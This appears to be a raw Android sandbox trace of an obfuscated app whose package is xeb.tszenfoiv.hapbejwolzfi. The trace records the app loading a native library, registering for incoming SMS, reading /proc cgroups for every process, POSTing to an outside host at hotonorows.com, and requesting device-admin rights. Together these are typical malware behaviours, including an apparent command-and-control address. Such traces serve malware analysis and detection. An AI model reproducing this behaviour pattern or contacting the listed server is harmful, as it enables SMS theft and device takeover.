D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/xeb.tszenfoiv.hapbejwolzfi-1/base.apk]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi]
D/S4URC   ( 5194): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/cache]
D/S4URC   ( 5194): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/cache]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/cache]
D/S4URC   ( 5194): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{xeb.tszenfoiv.hapbejwolzfi/xeb.tszenfoiv.hapbejwolzfi.Mrjldcphix}]
D/S4URC   ( 5194): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [Ftpaimel]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/xeb.tszenfoiv.hapbejwolzfi-1/lib/arm]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/xeb.tszenfoiv.hapbejwolzfi-1/lib/arm/libFtpaimel.so]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs/file.xml]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs/file.xml.bak]
D/S4URC   ( 5194): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs/file.xml]
D/S4URC   ( 5194): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][file.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi]
D/S4URC   ( 5194): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/files]
D/S4URC   ( 5194): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/files]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/files]
D/S4URC   ( 5194): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs/file.xml.bak]
D/S4URC   ( 5194): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs/file.xml]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/shared_prefs/file.xml]
D/S4URC   ( 5194): [SDK] [java.io.File] [listFiles] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/files]
D/S4URC   ( 5194): [SDK] [java.io.File] [list] [FilePath][String] [/data/data/xeb.tszenfoiv.hapbejwolzfi/files]
D/S4URC   ( 5194): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.provider.Telephony.SMS_RECEIVED,
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/]
D/S4URC   ( 5194): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.provider.Telephony.SMS_DELIVER]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/priv-app/Mms/Mms.apk]
D/S4URC   ( 5194): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.provider.Telephony.WAP_PUSH_DELIVER]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 5194): [SDK] [android.app.ActivityManager] [getRunningTasks]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 5194): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 5194): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://hotonorows.com/h7zugdium85k7pubwe/index.php]
D/S4URC   ( 5194): [SDK] [java.io.File] [list] [FilePath][String] [/proc]
D/S4URC   ( 5194): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://hotonorows.com/h7zugdium85k7pubwe/index.php]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/13/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/13/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/14/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/14/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/15/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/15/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/16/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/16/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/17/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/17/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/18/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/18/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/23/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/23/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/25/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/25/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/26/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/26/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/27/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/27/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/28/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/28/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/29/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/29/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/30/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/30/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/31/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/31/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/32/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/32/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/34/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/34/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/127/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/127/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/129/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/129/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/133/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/133/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/134/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/134/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/342/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/342/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/494/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/494/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/571/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/571/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/586/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/586/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/608/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/608/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/645/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/645/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/720/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/720/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/788/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/788/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/817/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/817/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/849/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/849/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/949/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/949/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/988/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/988/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1042/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1042/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1068/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1068/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1111/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1111/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1250/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1250/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1957/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1957/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1986/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1986/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2051/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2051/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2147/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2147/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2271/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2271/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2594/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2594/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2627/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2627/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2676/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2676/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2784/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2784/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3530/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3530/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3640/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3640/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3680/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3680/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3761/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3761/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3787/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3787/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3811/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3811/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3985/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3985/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/4787/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/4787/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/4850/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/4850/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/5097/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/5097/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/5118/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/5118/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/5177/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/5177/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/5194/cgroup]
D/S4URC   ( 5194): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/5194/cgroup]
D/S4URC   ( 5194): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{xeb.tszenfoiv.hapbejwolzfi/xeb.tszenfoiv.hapbejwolzfi.Imfauhznrb}]
D/S4URC   ( 5194): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
